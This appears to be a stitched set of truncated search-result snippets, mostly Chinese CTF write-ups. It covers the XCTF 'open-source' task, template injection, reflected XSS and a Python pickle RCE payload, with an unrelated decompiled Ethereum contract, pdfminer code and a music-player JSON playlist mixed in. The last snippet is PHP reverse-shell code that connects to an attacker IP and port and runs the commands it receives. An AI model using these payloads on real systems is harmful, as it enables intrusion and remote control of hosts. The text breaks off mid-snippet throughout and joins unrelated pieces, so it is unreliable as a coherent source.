XCTF-open-source 下载附件拿到源码。 #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsigned int first = atoi(argv[1]); if (first != 0xcafe) { printf("you are wrong, sorry.\n"); exit(2);...
xctf-open-source 这题给了源码,直接IDE打开即可, 很容易就能看出hash就是要求的答案,为了执行到最后一步,就不能执行前面所有的if语句,依次可得first=0xcafe,second%17=8,argv[3]=""h4cky0u",把hash的赋值里的first,second%17和argv[3]全部替换掉,然后把前面的代码全删了直接运行就得到flag 最后的flag是c0f...
# Let's make the world open source #consteth_balance=eth.balance(this.address)def storage:stor0 is addr at storage0stor1 is addr at storage1balanceOf is mappingofuint256 at storage2stor3 is mappingofuint8 at storage3unknown35983396 is mappingofuint256 at storage4defunknown35983396(addr _pa...
根据view_source协议的知识得,在url前添加它即可。事实上直接fn+f12即可直接查看网页源码,得出的结果也是一样的。Web_python_template_injection 题目描述 进入题目场景,知道为模板注入 解题通常有2种解法,手工注入和借助kali里的tqlmap脚本注入 手工注入:1.测试注入:(有回显说明存在漏洞)payload:http://111....
view-source:http://seafaring.xctf.org.cn:9999/admin/可以发现后台一些api和参数 handle_message.php 存在反射型XSS bot使用的是firefox浏览器 于是构造html让bot访问 <html> <script> window.onload =function(){ document.getElementById("f").submit(); ...
(path):withopen(path,'rb')asfp:# 用文件对象来创建一个pdf文档分析器praser=PDFParser(fp)# 创建一个PDF文档doc=PDFDocument()# 连接分析器 与文档对象praser.set_document(doc)doc.set_parser(praser)# 提供初始化密码# 如果没有密码 就创建一个空的字符串doc.initialize()# 检测文档是否提供txt转换,...
1. open-source 题目给出了一段代码如下: #include <stdio.h> #include <string.h> intmain(intargc,char*argv[]) { if(argc!=4) { printf("what?\n"); exit(1); } unsignedintfirst=atoi(argv[1]); if(first!=0xcafe) { printf("you are wrong, sorry.\n"); ...
新春分享赛2020 (天璇Merak) web sqlcheckin 考虑万能密码。 webtmp 考察python反序列化 读源码可知需要覆盖name和category 且需要避免使用R指令码,网上可以搜到使用C指令码来绕过执行RCE 构造payload: s3 = b"\x80\x03c__main__\nsecret\n}(Vname\nVhaha\nVcategory\nVgaga\nub0c__main__\nAnimal\n)\...
"cover_art_url": "https://521dimensions.com/img/open-source/amplitudejs/album-art/die-digital.jpg" }, { "name": "Offcut #6", "artist": "Little People", "album": "We Are But Hunks of Wood Remixes", "url": "https://521dimensions.com/song/Offcut6-LittlePeople.mp3", "cover_ar...
php$ip='174.137.58.6';// 改为攻击者的 IP 地址$port=6666;// 改为攻击者监听的端口// 创建一个 socket 连接到攻击者的机器$socket=fsockopen($ip,$port);if($socket){// 通过 shell_exec 执行系统命令并将输出发送到 socketwhile($cmd=fgets($socket,1024)){$cmd=trim($cmd);// 去除命令末尾的...